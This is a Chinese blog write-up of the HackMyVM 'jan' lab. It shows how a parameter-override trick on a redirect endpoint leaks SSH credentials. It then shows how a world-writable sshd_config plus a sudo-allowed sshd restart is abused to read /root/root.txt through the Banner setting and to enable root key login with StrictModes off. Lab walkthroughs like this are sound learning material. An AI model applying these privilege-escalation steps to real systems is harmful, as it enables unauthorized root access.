首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >hackmyvm jan

hackmyvm jan

原创
作者头像
babyctfer
发布2025-08-13 15:14:48
发布2025-08-13 15:14:48
7800
代码可运行
举报
文章被收录于专栏:CTF学习笔记CTF学习笔记
运行总次数:0
代码可运行

jan ssh利用

web信息泄露

Welcome to our Public Server. Maybe Internal. 只能内部访问

robots.txt泄露了两个路径

代码语言:javascript
代码运行次数:0
运行
复制
 /redirect
 /credz

https://www.hyhforever.top/posts/2025/04/hackmyvm-jan/

看了大佬的wp,说这里是变量覆盖,

http://127.0.0.1/redirect?url=adfads&url=/credz

userflag

代码语言:javascript
代码运行次数:0
运行
复制
 ssh/EazyLOL       获取都用户名和口令ssh登录

root flag

代码语言:javascript
代码运行次数:0
运行
复制
  sudo -l
 Matching Defaults entries for ssh on jan:
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 ​
 Runas and Command-specific defaults for ssh:
     Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"
 ​
 User ssh may run the following commands on jan:
     (root) NOPASSWD: /sbin/service sshd restart
 ​

可以重启ssh服务,发现sshd_config可写,通过banner设置为/root/root.xt读取root flag

代码语言:javascript
代码运行次数:0
运行
复制
 ls -al 
 -rw-rw-rw-    1 root     root          3364 Aug 12 15:10 sshd_config
 ​
 vi sshd_config
 Banner /root/root.txt 
 ​
 sudo service sshd restart    
 重新登录获取flag

拿shell方案

代码语言:javascript
代码运行次数:0
运行
复制
 # 注意:如果默认 PermitRootLogin 是 no,需要改成 yes 或 prohibit-password (允许公钥登录)。
 PermitRootLogin yes
 ​
 # 确保服务器允许公钥认证
 PubkeyAuthentication yes
 ​
 # 指向你刚才创建的文件
 AuthorizedKeysFile /home/ssh/key
 ​
 StrictModes no
 ​
 #注意,我们是把公钥放在了自定义文件中,这与 SSH 的严格模式冲突,会导致导致 sshd 不信任其中的公钥。
 即使 `sshd_config` 文件里 `#StrictModes yes` 是注释掉的,OpenSSH 默认仍会把它视为 `yes`。
 只有显式设置 `StrictModes no`,才会允许加载不安全路径下的 authorized_keys 文件

StrictModes yes 是一个配置项,用于指定在sshd启动过程中是否验证home目录和.ssh目录的权限。当StrictModes设置为yes时,sshd会要求家目录和.ssh目录的权限设置非常严格,必须是特定的权限设置才能通过验证

端口定位进程启动命令

代码语言:javascript
代码运行次数:0
运行
复制
 jan:~# netstat -tunpl
 Active Internet connections (only servers)
 Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
 tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      9816/sshd [listener
 tcp        0      0 :::8080                 :::*                    LISTEN      2449/httpz
 tcp        0      0 :::22                   :::*                    LISTEN      9816/sshd [listener
 ​

定位进程号 2449

代码语言:javascript
代码运行次数:0
运行
复制
 cat /proc/2449/cmdline
 ​
 /opt/httpz      go语言写的程序,

至于开头的重定向绕过是什么逻辑,靶机作者自己写的httpz的可执行文件(go语言),需要反编译才能看到,我不会遂放弃

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • jan ssh利用
    • web信息泄露
    • userflag
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档